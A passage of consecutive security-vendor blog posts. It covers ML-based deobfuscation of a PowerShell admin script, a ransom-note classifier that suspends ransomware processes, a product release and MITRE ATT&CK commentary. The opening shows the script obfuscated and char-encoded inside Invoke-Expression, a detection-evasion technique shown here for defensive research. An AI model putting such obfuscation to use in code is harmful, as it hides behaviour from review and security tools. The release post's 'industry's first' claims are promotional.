        ${USER`li`sT} = &("{0}{2}{3}{1}" -f'Ge','nt','t-','Conte') -Path ${u`SEr}
    }
    else
    {
        ${usER`L`ISt} = ${Us`Er}
    }
    
    ${c`oNT`AIneR} = ("{3}{11}{4}{8}{5}{0}{7}{10}{6}{2}{1}{9}" -f'ir','irtran,',',DC=a','OU','a',',OU=A','an','tran Users,OU=Air','bled','DC=com','tr','=Dis')
    ${D`eS`CrIP`TIon} = ('Term'+'ina'+'ted '+'per'+''+"$SrNumber")
    
    foreach (${uS`eR} in ${U`S`E`RList})
    {
        .("{2}{0}{1}" -f'et','-ADUser','S') -Identity ${Us`ER} -Server ${D`OM`AIN} -Enabled ${FA`LsE} -Description ${D`eSCrI`P`TION}
        ${UsE`RHan`dlE} = &("{2}{0}{1}"-f'U','ser','Get-AD') -Identity ${us`eR} -Server ${Do`M`AiN}
        &("{3}{1}{2}{0}" -f't','je','c','Move-ADOb') -Identity ${uSe`Rh`AnD`Le} -Server ${doM`A`In} -TargetPath ${C`O`Nt`Ainer}
    }
    
    Figure 12: Obfuscated Sample

     

    And then encode it:

    InVoKe-eXPreSsION ( [STRInG]::join('' , (( 13,10,112 , 97 , 114 ,97 , 109 , 13,10 ,40,13,10,32, 32 ,32 ,32,91 ,80 ,97 ,114 ,97 , 109 , 101 ,116 ,101 ,114,40 , 77, 65, 110 , 100, 97 ,116,111,82, 121,61, 36,123 ,102 , 65 ,96, 108 ,96,83 , 101 , 125,41,93,32, 36 ,123, 100,79,77,96,65 ,96,105,78,125 , 32 ,61 ,32 , 40 ,34 ,123,51, 125,123 ,50,125 , 123,49, 125 , 123, 48,125 ,34 ,45,102,39 ,109, 39, 44 ,39, 97,110 ,46 ,99,111, 39,44 ,39 , 114,39,44, 39 ,97 , 105,114, 116 ,39,41, 44 ,13 , 10, 32, 32, 32, 32,91 , 80 ,97, 114 ,97,109 ,101,116 , 101, 114,40 ,77, 97,78,68 ,65, 84, 111 , 114, 89 , 61 , 36 ,123 ,116 ,82 ,96 , 85, 101 , 125 , 41 ,93 , 32 ,32, 36,123, 83 , 96 , 82 , 96 ,78 , 85 , 96 ,109, 66 ,101,114,125 ,44 , 13,10, 32,32 ,32,32 , 91,80 ,97 ,114,97 ,109 , 101,116, 101 , 114, 40 , 109, 97 ,110 , 100,97,84,79 , 114 ,121,61, 36 , 123 ,70, 65 ,108 , 96,115 ,69,125, 41 , 93 ,32 ,36,123 , 116,65 ,114, 96 ,71 ,69 , 96,84,96,112, 65 , 116 ,72, 125 ,32 , 61 ,32 , 40 , 34 , 123 , 48, 125, 123, 56 ,125 , 123 , 50 ,125 ,123 ,55 ,125,123 ,49 , 51 , 125 , 123,57 ,125,123, 52, 125, 123,51 ,125 ,123 , 49 ,50 ,125, 123 ,49, 49,125,123,49 , 48 ,125, 123 , 54 ,125 , 123 ,53, 125, 123 ,49 ,125,34, 32,45 , 102 , 32,39 ,79 , 85 ,39 , 44 ,39 ,68,67, 61, 99, 111, 109,39, 44 ,39,100,44, 79, 85, 39 , 44, 39 ,85 ,39, 44,39 , 115, 101,114 , 115 ,44 ,79 , 39,44, 39, 116 ,114 , 97, 110 , 44 , 39 , 44 ,39,105,114 , 39 , 44,39,61, 65 ,39, 44, 39, 61 , 68,105,115 , 97 ,98, 108 ,101, 39, 44 , 39,114 , 97,110 ,32, 85,39, 44 ,39 ,61, 97 ,39 , 44 , 39,65 , 105, 114 , 116 ,114,97, 110, 44 , 68 , 67 ,39 , 44 , 39, 61, 39 , 44,39, 105 , 114 ,116 ,39 ,41,44,13 ,10 ,32, 32,32 ,32 , 91 , 80 , 97 ,114,97,109,101 , 116, 101,114, 40,109,97, 78,100 , 97 , 84 , 111 , 82, 121 , 61 ,36, 123 ,84 ,96, 82,117 , 101 ,125,41, 93 , 32 , 32, 36 , 123,85,96, 115 ,69 ,82, 125 ,13, 10 ,41 ,13 ,10, 13 , 10,105, 102, 32 ,40 ,38 , 40,34 ,123 , 50, 125 ,123,49 , 125, 123, 48 , 125 ,34,32, 45 , 102 ,39,116 , 104, 39,44 ,39 ,80 ,97,39,44 ,39 ,84, 101,115, 116 ,45 , 39 , 41, 32 , 36 , 123, 85 ,83 ,96 ,69,114 , 125 ,41,13 ,10 , 123,13 , 10 ,32 , 32,32,32,36 , 123 ,85,96, 115,69 , 114 , 108, 96 ,105 , 83 , 116 ,125, 32 ,61 ,32 , 38, 40 , 34 ,123,50 , 125,123, 48 ,125, 123 , 49 ,125, 34 , 45 ,102 ,32, 39 , 101, 116, 45,67 ,111, 110 , 39 ,44,39 , 116 , 101, 110 ,116,39 , 44,39 , 71,39,41, 32 , 45,80 ,97, 116,104 , 32, 36 , 123,117,96,83 , 69 ,82, 125 , 13,10 , 125,13, 10 ,101 , 108 ,115 , 101 , 13 ,10 , 123,13 ,10 ,32,32 , 32 , 32, 36 , 123 , 117,96 ,115, 96 , 101 , 82 , 76 , 96, 105,115, 84 ,125,32 ,61,32, 36, 123,85 ,96 ,83, 101 ,114,125 , 13,10 , 125 , 13,10,13, 10, 36 , 123 , 99 ,79,96, 78 ,116,97 , 73,110 , 96 , 69 ,82, 125 , 32,61 , 32 , 40 ,34 ,123 ,51,125 , 123, 52 , 125, 123, 48 , 125 , 123 , 54 ,125, 123 ,49,48 , 125,123,57 , 125,123 ,56 ,125,123,49 , 125 , 123,55, 125 , 123,49 , 50 ,125 , 123 ,49 ,49, 125,123 ,50 ,125,123 ,53,125 , 34 ,45 ,102, 39,101, 100 ,39 ,44 ,39 , 115 ,44, 79, 85, 61,65 ,105 , 114, 39 , 44 ,39 , 110 , 44, 39,44 , 39 ,79 ,85, 61 , 68 , 105,115 , 39 , 44,39, 97 ,98, 108 ,39 ,44, 39 ,68 , 67 ,61, 99 , 111,109 ,39 , 44 , 39,44 , 79,85, 39, 44 ,39 ,116,114 , 39 ,44, 39, 114 , 39,44,39,97 ,110 , 32 ,85, 115,101, 39 ,44,39,61, 65 , 105 , 114 , 116, 114 ,39 ,44 , 39, 97, 39 , 44 ,39,97, 110, 44, 68 ,67, 61,97,105 ,114 ,116 ,114 ,39, 41 ,13, 10 , 36 , 123,100 ,69,115,96,67 ,114 , 73, 96, 112,84 , 105 ,96 ,111,78, 125 , 32, 61 ,32 , 40,39 ,84,101,114 ,109 , 105,110 ,97, 39,43 , 39 , 116 , 39 , 43 , 39 ,101, 39 ,43, 39, 100 , 
32,39, 43 , 39,112,39,43 ,39 ,101, 114 ,32 ,39 , 43 , 34 ,36, 83, 114,78,117 , 109 , 98 ,101, 114 , 34,41,13 ,10 , 13,10,102 , 111 , 114 ,101 , 97,99 , 104 , 32, 40 ,36 , 123 ,117, 83 ,96,101,114 ,125,32,105 , 110,32,36, 123 , 117,96 , 83 ,69, 114 ,96, 76, 96 , 105, 115 ,84 ,125,41, 13 , 10 ,123 ,13 , 10, 32, 32, 32 , 32,46 ,40, 34 ,123 , 49 ,125, 123 , 51, 125,123 ,48,125,123, 50, 125,34, 45 ,102, 32 , 39 , 101,39,44,39,83 ,39,44,39 ,114 ,39 ,44,39 , 101 ,116 , 45, 65,68, 85 , 115,39,41, 32 , 45,73,100, 101 , 110 ,116, 105 , 116 , 121 , 32 ,36 ,123, 117,96, 83 ,69 , 114, 125 ,32 ,45 , 83 , 101 ,114, 118 , 101 ,114 ,32 ,36, 123 ,68 , 79, 77, 96 ,65, 105 ,110 , 125 ,32, 45, 69 ,110 , 97 ,98,108 , 101,100,32 ,36, 123 ,70 , 65 ,96,76,96 , 115, 69 , 125, 32 ,45 , 68 ,101 ,115 , 99, 114, 105, 112, 116, 105 , 111,110 , 32,36, 123 ,68 , 101,96,115 , 99,82 ,73,96 , 112 , 116 ,96, 73 , 111, 110 , 125, 13,10,32 ,32 , 32 , 32 , 36,123,85,83,96,69 , 114,96, 72, 65 , 78, 68, 96 , 108 ,101,125,32,61, 32 ,46,40 , 34,123,49,125 , 123,50 , 125 , 123, 48,125 , 34 , 45 , 102, 39, 101,114, 39, 44, 39 ,71 ,101, 116,45, 65, 68 ,85, 39,44 ,39,115 , 39,41,32, 45 , 73 , 100 ,101 , 110 ,116 , 105 , 116,121 ,32,36 ,123, 117 , 96 , 115, 101 ,82 ,125, 32 , 45 ,83, 101,114 , 118,101, 114 , 32,36, 123,68,79 ,109 , 96,65,96 ,73,110 ,125 ,13 , 10, 32,32 , 32 , 32 ,38 , 40,34,123,51,125 ,123, 49,125,123,48 ,125 ,123 , 50 , 125,34 ,32 ,45 ,102, 32 ,39, 106, 101 ,39 , 44 ,39 ,68, 79 ,98 ,39 ,44 , 39 , 99,116 ,39 ,44, 39,77,111 , 118, 101 , 45 , 65,39 , 41,32 , 45, 73 , 100,101, 110,116,105,116 ,121, 32,36 ,123,117 ,115, 96 , 101 ,96,82 , 104,97 ,96 ,78 , 100 ,76 , 69 ,125 , 32 ,45 ,83 , 101 ,114 , 118, 101 , 114 ,32, 36 ,123 , 100, 111 , 96,77 ,65,96, 73,78 ,125,32,45 ,84 ,97,114, 103 , 101, 116,80 ,97,116 , 104, 32 ,36,123 ,99 , 79, 96,78,116 , 97,73 , 96 ,78,96,69,82,125 ,13 ,10 ,125 , 13,13 ,10 )| foreACH{ ( [CHAr][iNt]$_) }) ))
    
    Figure 13: Obfuscated and Encoded Sample

     

    Now we can run it through our system. This returns two outputs: 1) A partially fixed version that does everything but the cleanup network; 2) A fully fixed version that includes the cleanup network. This is because the cleanup network is still very much experimental and might produce unintended output.

     

    Partially Fixed:

    param
    (
        [Parameter(MAndatoRy=${fAlSe})] ${dOMAiN} = "airtran.com",
        [Parameter(MaNDATorY=${tRUe})]  ${SRNUmBer},
        [Parameter(mandaTOry=${FAlsE})] ${tArGETpAtH} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com",
        [Parameter(maNdaToRy=${TRue})]  ${UsER}
    )
    if ("Test-Path" ${USEr})
    {
        ${UsErliSt} = "Get-Content" -Path ${uSER}
    }
    else
    {
        ${useRLisT} = ${USer}
    }
    ${cONtaInER} = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com"
    ${dEsCrIpTioN} = ('Terminated per $SrNumber")
    foreach (${uSer} in ${uSErLisT})
    {
        "Set-ADUser" -Identity ${uSEr} -Server ${DOMAin} -Enabled ${FALsE} -Description ${DescRIptIon}
        ${USErHANDle} = "Get-ADUser" -Identity ${useR} -Server ${DOmAIn}
        "Move-ADObject" -Identity ${useRhaNdLE} -Server ${doMAIN} -TargetPath ${cONtaINER}
    }
    
    Figure 14: Partially Deobfuscated Sample

     

    Fully Fixed:

    param
    (
        [Parameter(Mandatory=$false)] $domain = "airtran.com",
        [Parameter(Mandatory=$true)]  $srnUmber,
        [Parameter(Mandatory=$false)] $targetPath = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com",
        [Parameter(Mandatory=$true)]  $User
    )
    if (Test-Path $user)
    {
        $userList = Get-Content -Path $User
    }
    else
    {
        $userList = $user
    }
    $container = "OU=Disabled,OU=Airtran Users,OU=Airtran,DC=airtran,DC=com"
    $Description = "Terminated per $SRNumber"
    foreach ($user in $UserList)
    {
        Set-ADUser -Identity $user -Server $domain -Enabled $false -Description $Description
        ${USErHANDle} = Get-ADUser -Identity $User -Server $domain
        Move-ADObject -Identity ${useRhaNdLE} -Server $domain -TargetPath $container
    }
    
    Figure 15: Fully Deobfuscated Sample

     

    Conclusion

    Not too shabby. We were able to obfuscate, encode, and then fix a PowerShell script file. This final output is not yet executable, but with a little work we can get there. Deobfuscation is a hard but not insurmountable challenge. Following the basic steps of collecting data, intelligently cleaning it, and applying ML techniques where appropriate allows us to reliably solve burdensome tasks to improve our workflow. With a little perseverance and helpful math, we can put the toothpaste back in the tube.

    Stop and Step Away from the Data: Rapid Anomaly Detection via Ransom Note File Classification


    Despite a decrease in deployment in 2018, ransomware remains a widespread problem on the Internet as malicious actors seek to shift towards more targeted campaigns (e.g. SamSam) and leverage more subtle methods of distribution rather than spear phishing messages. Over the last few years, static analysis of binaries prior to execution and dynamic detections that attempt to identify anomalous process activity as it occurs have emerged as the dominant approaches to mitigating ransomware.

    While these solutions can be effective, they can sometimes take too long to determine if a process is truly malicious or miss certain processes due to focusing solely on executables. As an experimental approach to address these shortcomings, and for presentation at BSidesLV and DEF CON AI Village this year, we developed a machine learning model to classify forensic artifacts common to ransomware infections: ransom notes. Leveraging this model, we were able to prototype a dynamic ransomware detection capability that proved to be both effective and performant.

    All related code and resources can be found at the noteclass project’s git repository: https://github.com/endgameinc/noteclass

     

    Ransom Notes

    The purpose of ransom notes is pretty straightforward:

    • Notify victims they have been infected with ransomware and that their files are encrypted
    • Instruct victims to provide a ransom payment (in the form of Bitcoin or other cryptocurrency) for the means to decrypt and restore access to the files
    • Provide a deadline for the ransom payment

    Ransom notes typically come in the form of TXT files, but there are also several instances of notes comprised of formatted/rich text (HTML, RTF) or images (JPG, PNG, BMP).

    Provided below are three examples of ransom notes:

    NotAHero

     

    CryptoLocker

     

    The Brotherhood

    The three notes, despite pertaining to infections caused by three separate ransomware samples, share a similar vocabulary and carry out the first two or all three of the objectives previously mentioned. With this knowledge in hand, we set out to determine if ransom notes are suitable for automated classification.

     

    Exploratory Research

    To determine the suitability of ransom notes for classification, we used K-means clustering as our approach and compiled two datasets:

    • Ransom notes
      • 173 notes obtained from detonating ransomware and scouring research blogs and Twitter
    • Benign data
      • Messages from the 20 Newsgroups dataset

    With our clustering approach, we merged the two distinct datasets into one unlabeled dataset and configured scikit-learn to produce 21 clusters. In our case, 21 corresponds to one cluster for the ransom notes plus one for each of the 20 newsgroups, as we hoped that the benign data from the newsgroups would cluster together according to their respective topics and that the ransom notes would form their own independent cluster.

    To prepare the data for clustering, each document in the combined dataset was tokenized:

    • Initial token preparation
      • ​Newline characters stripped
      • All text converted to lowercase
    • Tokenization
      • ​Non-alphanumeric characters stripped
      • Stop words stripped
        • ​e.g., the, for, your
      • Lemmatization
        • ​encryption → encrypt 

    The remaining tokenized data was then vectorized by counting word occurrences in each document (CountVectorizer) and then transforming those vectors to more heavily weigh less common (with respect to the entire overall text data corpus) words using term frequency-inverse document frequency (TfidfVectorizer).
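
    To make those two steps concrete, here is a minimal sketch using scikit-learn. The counting and TF-IDF re-weighting are split into CountVectorizer and TfidfTransformer here, and the helper load_documents(), the vectorizer options, and the cluster seed are illustrative assumptions rather than the exact research code.

    from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
    from sklearn.cluster import KMeans

    documents = load_documents()  # hypothetical helper returning the combined corpus as a list of strings

    # Count word occurrences per document (ngram_range=(2, 2) would yield the bigram view instead)
    count_vectorizer = CountVectorizer(stop_words="english", lowercase=True)
    counts = count_vectorizer.fit_transform(documents)

    # Reweigh the counts so words that are rare across the whole corpus carry more weight
    tfidf = TfidfTransformer()
    vectors = tfidf.fit_transform(counts)

    # 21 clusters: one for the ransom notes plus one per newsgroup topic
    kmeans = KMeans(n_clusters=21, random_state=42)
    labels = kmeans.fit_predict(vectors)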

    To provide an initial overview of the data, we looked at the top 20 words according to the CountVectorizer results.

    Top 20 Words

     

    Even without any provided context, these words strongly relate to the previously seen ransom note samples. A quick look at the top bigrams provides additional context and helps to paint a more vivid picture of the data.

    Top 10 Bigrams

     

    When the vectorized data was clustered, we ended up with the following results:

    Cluster Overview

     

    As highlighted above, the ransom notes appear to have been clustered into their own group in Cluster 3. A brief overview of the topics in the Newsgroups datasets provides additional context into the other clusters:

     

    Topics covered in the 20 Newsgroups set

     

    In order to validate our clustering, we conducted additional tests with varying data. For our first test, we wanted to determine if a ransom note that was not in our dataset would be placed into the correct cluster:

     

    We calculated the distance from the centroid for each of the clusters, and the closest cluster came out to be Cluster 3, as desired.
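
    Assuming the fitted vectorizers and KMeans model from the sketch above are still in scope, that test can be approximated as follows; the file name is hypothetical.

    import numpy as np

    new_note = open("unseen_ransom_note.txt").read()   # hypothetical unseen ransom note
    new_vec = tfidf.transform(count_vectorizer.transform([new_note]))

    distances = kmeans.transform(new_vec)[0]   # distance from the note to each cluster centroid
    closest_cluster = int(np.argmin(distances))
    print("closest cluster:", closest_cluster)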

    For our second test, we provided a block of text that contains terms relevant to ransom notes, but without the necessary context or phrasing to comprise an actual ransom note:

     

    According to our results, this text block was placed into Cluster 4, which contains messages from the comp.graphics newsgroup.

    Despite the small size of our set of ransom notes (especially in comparison to the overall size of the combined dataset), the data clustered together very well and our two tests demonstrated some nuance in how the data was clustered. Satisfied with the results, we deemed the dataset appropriate for classification and began building out our prototype.

     

    POC Framework

    Since the ultimate goal is to detect the presence of a ransom note on a live system as quickly as possible after it is written to disk, we came up with the following high-level requirements:

    • Obtain file change events in near real-time
    • Obtain paths of newly created text files
    • Read in file contents and determine if data consists of a ransom note
    • If file is a ransom note, suspend the source process and notify user of activity

    Provided below is a diagram that describes how the framework operates and responds to a ransomware process dropping a ransom note to disk:

    Ransomware Attack Scenario / Framework Workflow Diagram

     

    Since this was developed as a POC, we decided to restrict our data to English TXT files less than 20 KB in size. For our purposes, though, these restrictions still cover a majority of ransom note samples that have been surveyed by researchers over the last few years, while helping our framework avoid other potential noise.

    To improve the accuracy of the classifier, we made some changes to our dataset. For the benign data, we reduced the number of messages from the 20 Newsgroups dataset down to a little over 8000 and then added over 3000 Windows TXT files (primarily README and log files). We procured more ransom notes and more than doubled the size of the set. Finally, we leveraged SMOTE (Synthetic Minority Oversampling Technique) to address the significant imbalance between the number of notes and the size of the benign dataset.
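
    A minimal sketch of that oversampling step, assuming the imbalanced-learn implementation of SMOTE and that X (the TF-IDF feature matrix) and y (0 = benign, 1 = ransom note) are already built:

    from imblearn.over_sampling import SMOTE

    smote = SMOTE(random_state=42)
    X_resampled, y_resampled = smote.fit_resample(X, y)

    In practice, SMOTE is typically applied only to the training split so that synthetic samples never leak into the test set.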

     

    Classifier

    Before we built the framework, we needed to build and test our model. As with our exploratory research, we carried out the same data sanitization and tokenization routine and feature selection was performed via TF-IDF. In contrast to our earlier research, we labeled each document as benign or ransom note data with the end goal of employing binary classification to any text and answering a simple question: “Is this text a ransom note or benign data?” We based our classifier on a Naïve Bayes model due to its relative ease of training, use, and speed.

    At a high-level, our data processing pipeline abides by the following workflow diagram:

    Data Processing Pipeline

     

    We utilized scikit-learn’s train_test_split to randomly partition our complete dataset into training (80%) and test (20%) subsets in order to fully test our model and get a more clear picture of its accuracy.
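
    Under those assumptions, the single train/test pass can be sketched roughly as follows; MultinomialNB and the specific metric calls are assumptions consistent with the description above, not the published training code.

    from sklearn.model_selection import train_test_split
    from sklearn.naive_bayes import MultinomialNB
    from sklearn.metrics import accuracy_score, f1_score, confusion_matrix

    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
    # (if using SMOTE, resample X_train / y_train here rather than the full dataset)

    model = MultinomialNB()
    model.fit(X_train, y_train)

    predictions = model.predict(X_test)
    print("Accuracy:", accuracy_score(y_test, predictions))
    print("F1 score:", f1_score(y_test, predictions))
    print("Confusion matrix:")
    print(confusion_matrix(y_test, predictions))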

    In our first test, we achieved the following results:

    Accuracy: 99.54%

    F1 Score: 91.86 (scaled to 100)

    Confusion Matrix:

    TN = 2934    FP = 14
    FN = 0       TP = 79

     

    While promising, one test only provides a glimpse into the model, and thus cross validation is required. To achieve this, we used ShuffleSplit to conduct a total of ten separate runs with varying training and test data sets for each run. As the results and graphs below demonstrate, the model remained robust to the additional tests.

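    A sketch of that cross validation pass, assuming the same X, y, and Naive Bayes model as above:

    from sklearn.model_selection import ShuffleSplit, cross_validate
    from sklearn.naive_bayes import MultinomialNB

    cv = ShuffleSplit(n_splits=10, test_size=0.2, random_state=42)
    scores = cross_validate(MultinomialNB(), X, y, cv=cv, scoring=["accuracy", "f1"])

    print("Average accuracy:", scores["test_accuracy"].mean())
    print("Average F1 score:", scores["test_f1"].mean())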

     

    Average Accuracy: 99.44%

    Average F1 Score: 90.1

    Average Confusion Matrix:

    TN = 2933.3    FP = 16.5
    FN = 0.5       TP = 76.7

     

    Graph Depiction of Ten Individual Test Runs: X-Axis differentiates each test iteration, whereas Y-Axis represents Accuracy (top)  and F1 Score (bottom)


     

    Event Listener

    After training an effective model, our next step was to develop an event listener. Before we started, we defined two basic requirements for our listener:

    • Monitor events from all active processes on the host
      • ​In particular, create events
      • Limit to TXT files
    • Map each event to a source process

    Since our goal was to quickly build a prototype framework, we used a pre-built tool that would do most of the heavy lifting in terms of gathering events. Luckily, the Windows Sysinternals tool suite provides one application that fills that need: Sysmon. Newer versions of Sysmon provide a custom Event ID for file creation activity:

     

    With this, we built a configuration file optimized to only capture file creation events for .txt files:

     

    Sysmon Configuration

     

    While installing Sysmon with a configuration file is straightforward, a registry key needs to be added to open up access to reading the event logs from external applications.

    Registry Modification

     

    After setting up and configuring the environment properly, we proceeded to develop a Python script to poll the event log for file creation events using WMI Query Language. The query ended up being the following:

    SELECT * FROM Win32_NTLogEvent
        WHERE LogFile = 'Microsoft-Windows-Sysmon/Operational'
        AND EventCode = 11
        AND RecordNumber > MaxRecordNumber
    

     

    Any events that popped up in the event log would be parsed and then inserted into a work queue for the classifier to process.
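
    As a rough illustration of that polling loop, a sketch built on the third-party wmi package might look like the following. The package choice, the one-second interval, and the record-number bookkeeping are assumptions; the original script's implementation was not published.

    import time
    import queue
    import wmi

    work_queue = queue.Queue()     # hand-off point to the classifier
    max_record_number = 0          # last Sysmon record we have already processed

    c = wmi.WMI()
    while True:
        query = ("SELECT * FROM Win32_NTLogEvent "
                 "WHERE LogFile = 'Microsoft-Windows-Sysmon/Operational' "
                 "AND EventCode = 11 "
                 "AND RecordNumber > " + str(max_record_number))
        for event in c.query(query):
            max_record_number = max(max_record_number, int(event.RecordNumber))
            work_queue.put(event)  # parsed create events for the classifier to consume
        time.sleep(1)              # poll roughly once per second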

    After integrating the classifier with the event logging component, the final piece of the framework that needed to be completed was process mitigation. The requirements we sketched were fairly straightforward:

    • Determine if the process ID and process name (parsed from event log output) exist
      • Suspend the process if it is currently active (see the sketch after this list)
    • Alert user of ransom note detection
      • Allow the user to decide to terminate or resume the process
      • Maintain a whitelist of resumed processes
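
    A minimal sketch of the suspend step, assuming the psutil package (the original framework's mitigation code was not published); pid and process_name come from the parsed Sysmon event:

    import psutil

    def suspend_if_active(pid, process_name):
        """Suspend the process flagged as the source of a ransom note, if it still exists."""
        try:
            proc = psutil.Process(pid)
            if proc.name().lower() == process_name.lower():
                proc.suspend()         # freeze the process until the user decides
                return True
        except psutil.NoSuchProcess:
            pass                       # process already exited
        return False

    From the resulting handle, the alert workflow can call resume() or kill() depending on the user's decision, and whitelist resumed processes to avoid re-alerting.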

     

    Here is a video of the completed framework in action:

     

    After limited testing against ransomware samples that we know generate TXT file-based ransom notes, we were able to detect samples from the following families:

    • TQV
    • Globelimposter
    • BTCWare
    • Everbe
    • Volcano
    • Rapid
    • Gandcrab
    • Painlocker
    • Sigrun (note in training set)
    • Josepcrypt (note in training set)
    • WhiteRose (note in training set)

    As with most prototype applications, there are some limitations to this framework and approach. Ransomware samples that don’t drop ransom notes, and specifically TXT ransom notes, would not be detected. Samples that drop notes later in the process life cycle would also degrade any quick detection capabilities afforded by this approach. Also, the model was only trained on English-based text, so any non-English ransom notes would likely not be detected.  

    Ransomware that attacks systems in other ways (e.g. MBR, raw disk/full disk encryption, screen locking) is likely not covered by this approach.

     

    Conclusion

    Current ransomware detection approaches focus largely on static and dynamic malware detection, ignoring the ransom note itself as a signal that could inform detection. Our research into applying machine learning classification demonstrated that ransom notes share enough features to be properly classified. With the classifier as the core component of a prototype framework, we demonstrated this approach's great potential for detecting ransomware earlier in the process lifecycle than typical dynamic detection frameworks. We will continue to evolve this new approach and explore novel means to apply machine learning to provide the best and most innovative protections possible.

    A Security Architecture First: Deployment Flexibility + Comprehensive Incident Review at Lowest Cost


    Today we announced the availability of version 3.3 of the Endgame platform, our seventh update of 2018.  This release includes the industry’s first flexible architecture to fully support cloud, on-premises and hybrid deployment for lowest cost of operations and complex compliance requirements.  

    Because this is a cloud-driven release, customers do not need to take any action on their endpoints to take advantage of the new capabilities and features. This release is specifically designed to address the major challenges of enterprise security teams: enhancing protection and scalability to stop attacks before damage and loss, and continuing to drive operational improvements in advanced hunting and response by augmenting the skills of security analysts at any experience level.

    New features in version 3.3 include:  

    • Multi-tier data model supporting cloud and on-premises options to accommodate the global compliance requirements of complex organizations while preserving a complete timeline of all events, wherever endpoints are deployed.   

    • Total Attack Lookback™ provides 120 days of non-repudiable forensic information about an incident and exceeds the average adversary dwell time at zero additional cost.  

    • Unique workflow automation and autonomous agent operations are extended by this architecture across global deployments. 

    The new architecture increases the scope, power and performance of Endgame’s groundbreaking automation technologies, Artemis, Resolver and EQL, eliminating the biggest barriers to immediate productivity by investigators, hunters and IT operations. It also makes critical threat intelligence data available to all customers free of charge through Total Attack Lookback™ - the industry’s first forensic review feature to exceed average adversary dwell time.  

    Using plain English, global attack visualization, and the industry’s first event query language optimized for security investigation, Endgame Total Attack Lookback™ provides analysts with a complete record of relevant operating system events to determine the origin and extent of a compromise and can serve as a guide to drive compliance and notification requirements. 

    Store Data Your Way Without Compromising Security Operations 

    The EU GDPR has led organizations to look very carefully at where their data lives, and Endgame allows for organizations to segment their data storage requirements in a way that works for them, rather than being forced to send everything to a central cloud platform. 

    Endgame customers now have the ability to deploy, extend, or modify their Endgame infrastructure to store forensic endpoint activity data in any combination of three storage destinations:   

    1. Streamed to Endgame Global Services – With the ever-increasing number of dissolvable VDI systems and endpoints that are not always connected to an organization’s private network, Endgame makes it simple to easily query historical data even if the system is offline, roaming, or completely destroyed. With Global Search, Endgame allows customers to use the same Artemis™ investigation tools across the streamed data from a single UI. 

    2. Distributed across endpoints – The forensic data can be stored on the endpoint and easily accessed, searched and investigated through the single Endgame console using Artemis™, our AI-powered chatbot that understands plain English questions and streamlines the investigation and hunting workflow used to interact with endpoint data.

    3. Streamed to private data stores – Organizations with a mature security operations function are investing in data analytics, and Endgame provides the ability to take our tamper-resistant, enriched endpoint data and integrate it easily into any third-party system like Splunk, Hadoop, or ELK.  Endgame’s API allows vendors and customers to build their own native integrations and we are rapidly adding more integration partners with a ServiceNow app available later this year.

    Only Endgame offers the ability to mix and match any of the above options, meaning a customer can have a hybrid approach to meet their organization's unique requirements.

    For example, one Endgame customer has their network divided into two sections. The first network streams endpoint data to Endgame Global Services for all systems that may be offline, roaming or destroyed (in the case of VDI or cloud workloads), and also streams to their own in-house data analysis system. The second network section stores event data locally due to limited bandwidth. Using Artemis™, their security analysts are able to easily query and run investigations and hunts across all endpoint information from devices on both networks, without thinking about where the data is stored or where the endpoint is located.  

    Total Attack Lookback™ 

    Though some vendors still like to claim they can prevent everything from malware to adversaries, Endgame knows that prevention in any aspect of security is not 100% perfect, and as an industry we know that the average dwell time remains above 90 days. If the endpoint data is not retained long enough, it may be impossible to fully investigate or perform root-cause analysis.  

    Unlike most endpoint security or EDR vendors who only allow retention to take place in their (often US-based) cloud – and some vendors will also limit their lookback capabilities by only offering 7-days of data storage before passing additional storage costs on to their customers –  Endgame’s Total Attack Lookback™ feature allows full investigations and hunting to span 120 days of the tamper-resistant forensic data, while customers remain in complete control of where their data lives.  All at no extra cost. 

    This customer-oriented approach to data storage, simplifying and enhancing the efficiency of security operations, makes Endgame the only complete endpoint security platform that truly allows an extreme reduction in the risk of breach, without increasing the business risk of data privacy. 

    More information about the Endgame Architecture and Total Attack Lookback™ can be found on our site or by requesting a demo.

    Putting the MITRE ATT&CK Evaluation into Context


    Today, MITRE published the results of their first public EDR product evaluation. This effort was a collaboration between MITRE and seven EDR vendors to understand how various products can be used to provide security teams with visibility into post-compromise adversary techniques. In the test, MITRE executed a set of techniques using open source methods mirroring previously-observed APT3 techniques. In their write-up, they’ve supplied information about how vendors provided alerting and/or visibility into data associated with their execution of a technique.

    This is an extremely valuable contribution to the infosec community. Frank, Katie, Blake, Chris and others at MITRE should be applauded for all the hours and energy they poured into generating this groundbreaking body of knowledge. The testing was well organized, the data captured thorough, and the finalization of results fair and collaborative. That last point is especially noteworthy given the huge amount of nuance and inherent lack of any one universal “right way” to address much of ATT&CK. This evaluation is a great achievement from MITRE, and we look forward to working with MITRE on continually refining the process and participating in future tests.

    As we reflect on the test and what it means, we would like to add some perspective to put the results into context.

    Why the MITRE ATT&CK evaluation is valuable and important

    Product testing is not new. Endgame is a participant in public testing and an active member of the Anti-Malware Testing Standards Organization (AMTSO). Transparency and openness are foundational Endgame operating principles. Not being afraid of competitive testing and evaluation is a necessary part of that, despite every independent test having different imperfections. We welcome it.

    What is new about this test is that it entirely emphasizes post-compromise visibility. Depending on which way you look at it, that is an area public evaluations have until now either intentionally ignored or treated as a complete or near-complete blind spot. This matters. Why?

    The community has become increasingly aware that it’s not all about exploit and malware blocking. Adversaries can perform operations using nothing but credentials and native binaries. Whether from a vendor or a result of home-grown detection engineering, none of our detections or protections are immune to bypass, no matter anyone’s claims. Organizations need to assume they’re breached and build security programs which allow for the discovery of active attackers in the environment.

    MITRE ATT&CK is by far the best, most authoritative knowledge base of techniques to consider in building a detection program which includes the “assume breach” concept. All organizations require tooling to give them data and detection capabilities, whether they build their own or, as most do, work with one or more vendors to provide data gathering, querying capabilities, alerting, and other components.

    The ATT&CK product evaluation provides a good reference dataset highlighting various methods of detection. It starts to move towards a taxonomy describing types of detection and visibility - the taxonomy MITRE has given us is complex and perhaps imperfect, but that’s reflective of the problem as a whole. It’s not a simple yes/no answer or a numeric score, like typical tests which measure whether a piece of malware was blocked or not. Most importantly, the evaluation moves us forward in emphasizing the fundamental importance of data visibility when it comes to building a program and considering tooling.

    The MITRE evaluation isn’t everything

